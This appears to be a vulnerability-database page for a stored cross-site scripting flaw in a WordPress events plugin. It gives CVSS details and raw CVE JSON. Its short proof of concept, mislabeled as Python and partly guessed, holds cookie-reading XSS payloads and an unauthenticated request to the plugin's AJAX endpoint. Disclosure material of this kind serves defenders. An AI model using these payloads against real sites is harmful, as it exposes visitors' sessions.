Security Vulnerability Report
中文
CVE-2025-11995 CVSS 7.2 HIGH

CVE-2025-11995

Published: 2025-11-01 05:16:02
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Community Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via event details parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Community Events插件 <= 1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11995 Stored XSS PoC // Target: WordPress Community Events plugin <= 1.5.2 // Attack Vector: Inject malicious JavaScript via event details parameter // Step 1: Identify the vulnerable parameter // The plugin processes event details through the 'event_details' or similar parameter // Step 2: Craft the XSS payload // Payload: <script>alert(document.cookie)</script> // Alternative payload with event handler: // <img src=x onerror=alert(document.cookie)> // Step 3: Send the malicious request (requires no authentication) const xssPayload = '<script>alert(document.cookie)</script>'; // Example HTTP request to trigger the vulnerability: const exploitRequest = { method: 'POST', url: 'https://target-site.com/wp-admin/admin-ajax.php', data: { action: 'community_events_save_event', event_details: xssPayload, // Other required parameters } }; // Step 4: When any user visits the affected page, the XSS will execute // The malicious script runs in the context of the victim's browser session

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11995", "sourceIdentifier": "[email protected]", "published": "2025-11-01T05:16:02.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Community Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via event details parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php?rev=3115223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384504%40community-events&new=3384504%40community-events&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c12bcf6-6297-457a-a807-28f5dbacb0eb?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.